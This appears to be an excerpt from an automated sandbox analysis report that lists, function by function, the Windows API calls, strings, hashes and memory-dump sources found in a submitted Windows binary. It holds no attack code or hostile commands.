                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                • String ID: 0
                                • API String ID: 4152858687-4108050209
                                • Opcode ID: c3e0366cd12edd053d7948961a8556025134d5a364eeec00bd9145fedec45a09
                                • Instruction ID: 8a7e58b7afdc3aad8b5b95ab1830894ec8ee620e78b309415a96c1a65c2086c3
                                • Opcode Fuzzy Hash: c3e0366cd12edd053d7948961a8556025134d5a364eeec00bd9145fedec45a09
                                • Instruction Fuzzy Hash: 2E51E4316093019AD7259F28C949B6BBFECEF89B50F0409AEF885E31D1DB74CE448752
                                APIs
                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFDAC5
                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AFDAFB
                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AFDB0C
                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AFDB8E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorMode$AddressCreateInstanceProc
                                • String ID: DllGetClassObject
                                • API String ID: 753597075-1075368562
                                • Opcode ID: b8a3ac0f39e81023bc371cbf19537fe450e30b947ef2110623f4c1266ae834cc
                                • Instruction ID: fe7ef9e5497e9efea942412159492fbd449b20a16ecc1582e3e6b297a099cb0e
                                • Opcode Fuzzy Hash: b8a3ac0f39e81023bc371cbf19537fe450e30b947ef2110623f4c1266ae834cc
                                • Instruction Fuzzy Hash: 2F418371600208EFDB16CFA4C984AAABBBAEF44351F1581A9FE059F205D7B1DD45CBA0
                                APIs
                                • _memset.LIBCMT ref: 00B02CAF
                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B02CCB
                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00B02D11
                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B66890,00000000), ref: 00B02D5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Menu$Delete$InfoItem_memset
                                • String ID: 0
                                • API String ID: 1173514356-4108050209
                                • Opcode ID: cd1fb6feac5cd5ac7975a934814f9e54963af26e8d6af386900794773231ac45
                                • Instruction ID: 7f9992dab0c17f8aa7fe41f02cbea37e70a028c98cba65661e8154f40c727c63
                                • Opcode Fuzzy Hash: cd1fb6feac5cd5ac7975a934814f9e54963af26e8d6af386900794773231ac45
                                • Instruction Fuzzy Hash: 384183311043029FD724DF24C889B5BBBE8EF85320F1446ADF965972D1DB70E909CB92
                                APIs
                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1DAD9
                                  • Part of subcall function 00AA79AB: _memmove.LIBCMT ref: 00AA79F9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BuffCharLower_memmove
                                • String ID: cdecl$none$stdcall$winapi
                                • API String ID: 3425801089-567219261
                                • Opcode ID: 52a09ee6683571e9cb51beddd8f85138c4ecfdcde398e18e637566429960147d
                                • Instruction ID: a3d069502d3f6d66e26732af478cdd8373822d2b1ee6843b6cc72724e39b9a32
                                • Opcode Fuzzy Hash: 52a09ee6683571e9cb51beddd8f85138c4ecfdcde398e18e637566429960147d
                                • Instruction Fuzzy Hash: D0316D71604619AFCF10EF64CD819EFB3F4FF05310B5086A9E866976D1DB71AA45CB80
                                APIs
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                  • Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7
                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AF93F6
                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AF9409
                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AF9439
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$_memmove$ClassName
                                • String ID: ComboBox$ListBox
                                • API String ID: 365058703-1403004172
                                • Opcode ID: dbf715d46ecc4d9004b325a643e7d658e33311797297f914af1714abe25a45ef
                                • Instruction ID: 7035e2c12f22c745035758f8df44f1c45314f4a8da13ed7c3e86ff18055bbe46
                                • Opcode Fuzzy Hash: dbf715d46ecc4d9004b325a643e7d658e33311797297f914af1714abe25a45ef
                                • Instruction Fuzzy Hash: 6821E171A00108AEDB14ABB0DC85EFFB7B8DF16360B104129FA25972E1DB354A0A9A20
                                APIs
                                  • Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
                                  • Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
                                  • Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91
                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B266D0
                                • LoadLibraryW.KERNEL32(?), ref: 00B266D7
                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B266EC
                                • DestroyWindow.USER32(?), ref: 00B266F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                • String ID: SysAnimate32
                                • API String ID: 4146253029-1011021900
                                • Opcode ID: 563ccc46e3293354b2c5d260528db4627f1dd530176dadfad313ea037b7ec801
                                • Instruction ID: 4152cef664ff0d9d7edb90195836957fcebe292880ff3e16b34fea83a682df89
                                • Opcode Fuzzy Hash: 563ccc46e3293354b2c5d260528db4627f1dd530176dadfad313ea037b7ec801
                                • Instruction Fuzzy Hash: 37219D71200216BBEF124F64FC80EBB37EDEB59368F104669F919931A0DB71CC519760
                                APIs
                                • GetStdHandle.KERNEL32(0000000C), ref: 00B0705E
                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B07091
                                • GetStdHandle.KERNEL32(0000000C), ref: 00B070A3
                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B070DD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CreateHandle$FilePipe
                                • String ID: nul
                                • API String ID: 4209266947-2873401336
                                • Opcode ID: dca6d77f4a3547d0b0e9cd44045816395afd0e5154e8ee430bbb64f62d7e239b
                                • Instruction ID: 78d781778aa9316ea5163c781adc9dc44057b40086de5fda0ce4c2b96ec9bd5c
                                • Opcode Fuzzy Hash: dca6d77f4a3547d0b0e9cd44045816395afd0e5154e8ee430bbb64f62d7e239b
                                • Instruction Fuzzy Hash: 5A215374944206ABDB209F68DC45A9ABBF4FF45720F2087A9FCA1D72D0EB70A851CB50
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 00B0712B
                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B0715D
                                • GetStdHandle.KERNEL32(000000F6), ref: 00B0716E
                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B071A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CreateHandle$FilePipe
                                • String ID: nul
                                • API String ID: 4209266947-2873401336
                                • Opcode ID: a3f95b9b954e330c5aa27aca2691f03f16122a0f52468abcb13cb854a9e30997
                                • Instruction ID: 8bc39151a09bd19b93f0b7d04f288e90e84b8f2f9f93de35f9253752af7b3ae7
                                • Opcode Fuzzy Hash: a3f95b9b954e330c5aa27aca2691f03f16122a0f52468abcb13cb854a9e30997
                                • Instruction Fuzzy Hash: 0A217475A442069BDB209F689C44AA9BBE8FF55720F200699FDA1E72D0DF70B8518B50
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00B0AEBF
                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B0AF13
                                • __swprintf.LIBCMT ref: 00B0AF2C
                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B2F910), ref: 00B0AF6A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorMode$InformationVolume__swprintf
                                • String ID: %lu
                                • API String ID: 3164766367-685833217
                                • Opcode ID: 8ca8c200655b73454a23a92b056151d4c03d415f3dd24948341228ebfcb18c19
                                • Instruction ID: 4b654dc46eb9ed892e83e974329b41b31d6b53dbb8607371610739b0cb139b9c
                                • Opcode Fuzzy Hash: 8ca8c200655b73454a23a92b056151d4c03d415f3dd24948341228ebfcb18c19
                                • Instruction Fuzzy Hash: AF214435A00209AFCB10EF64C985DAE7BF8EF49704B1040A9F909EB251DB31EA45CB61
                                APIs
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                  • Part of subcall function 00AFA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AFA399
                                  • Part of subcall function 00AFA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFA3AC
                                  • Part of subcall function 00AFA37C: GetCurrentThreadId.KERNEL32 ref: 00AFA3B3
                                  • Part of subcall function 00AFA37C: AttachThreadInput.USER32(00000000), ref: 00AFA3BA
                                • GetFocus.USER32 ref: 00AFA554
                                  • Part of subcall function 00AFA3C5: GetParent.USER32(?), ref: 00AFA3D3
                                • GetClassNameW.USER32(?,?,00000100), ref: 00AFA59D
                                • EnumChildWindows.USER32(?,00AFA615), ref: 00AFA5C5
                                • __swprintf.LIBCMT ref: 00AFA5DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                • String ID: %s%d
                                • API String ID: 1941087503-1110647743
                                • Opcode ID: 6a314ff70b5851fea652281f0b23ea98b4fcbfdcf63760e1c9b4b7782270e2a7
                                • Instruction ID: d5f85928fa017fbc0c57b6b365056dd250d1d3fc56f54d15907ade2c30b4b5a2
                                • Opcode Fuzzy Hash: 6a314ff70b5851fea652281f0b23ea98b4fcbfdcf63760e1c9b4b7782270e2a7
                                • Instruction Fuzzy Hash: F311AFB5600209BBDF11BFA0DD85FFA37BCEF59700F0440B5BA0CAA192CA7059468B75
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 00B02048
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                • API String ID: 3964851224-769500911
                                • Opcode ID: c59892e158a1062803558a1da6bcffe6b13105a09aedc1de6265fa1199138f1c
                                • Instruction ID: c6ff115ff2d39a5f4b96c72a6b81257fbc03d1b5e25a05678971bd1fb52a436b
                                • Opcode Fuzzy Hash: c59892e158a1062803558a1da6bcffe6b13105a09aedc1de6265fa1199138f1c
                                • Instruction Fuzzy Hash: F8111E31910209DFCF50EFA4D9519EEB7F4FF16304B5085E9D85667291EB325E0ACB50
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B1EF1B
                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B1EF4B
                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B1F07E
                                • CloseHandle.KERNEL32(?), ref: 00B1F0FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                • String ID:
                                • API String ID: 2364364464-0
                                • Opcode ID: 63ade729e37cf4c8762543def7001afc0b8ae2b06628af4a721a98f39376d164
                                • Instruction ID: b3f5098d15901e24e45edde73fbf2e818b89d0ded411d1fc0b013b2a4250c80a
                                • Opcode Fuzzy Hash: 63ade729e37cf4c8762543def7001afc0b8ae2b06628af4a721a98f39376d164
                                • Instruction Fuzzy Hash: 2A816E71604301AFD720EF28C986B6AB7E5EF48720F54886DF9999B2D2DB70EC41CB51
                                APIs
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                  • Part of subcall function 00B210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B20038,?,?), ref: 00B210BC
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20388
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B203C7
                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B2040E
                                • RegCloseKey.ADVAPI32(?,?), ref: 00B2043A
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B20447
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                • String ID:
                                • API String ID: 3440857362-0
                                • Opcode ID: 58508c0199f9120d4b07e286acde421e75dd29c27b6c1a42f954357ccc2babef
                                • Instruction ID: b9464a4a6f0b645fa81632bf9be173068744240c4f6934ed89066018ef3f2527
                                • Opcode Fuzzy Hash: 58508c0199f9120d4b07e286acde421e75dd29c27b6c1a42f954357ccc2babef
                                • Instruction Fuzzy Hash: B7514631218205AFD704EF64D981E6FB7F8FF88704F04896DB5999B2A2DB30E905CB52
                                APIs
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B1DC3B
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00B1DCBE
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B1DCDA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00B1DD1B
                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B1DD35
                                  • Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07B20,?,?,00000000), ref: 00AA5B8C
                                  • Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07B20,?,?,00000000,?,?), ref: 00AA5BB0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                • String ID:
                                • API String ID: 327935632-0
                                • Opcode ID: dcfedd79ef7fd21e077ff146e7a1bb691e1da93e596362220d2bdaf8124a9ff6
                                • Instruction ID: eb2cf6662ff5daa5f3ddcee401a04b5e58de5251ad5e9e0dd533fb4e5a239ea2
                                • Opcode Fuzzy Hash: dcfedd79ef7fd21e077ff146e7a1bb691e1da93e596362220d2bdaf8124a9ff6
                                • Instruction Fuzzy Hash: B9511875A00605EFCB00EFA8C584DEEB7F4FF59320B5484A9E815AB361DB31AD85CB91
                                APIs
                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B0E88A
                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B0E8B3
                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B0E8F2
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B0E917
                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B0E91F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
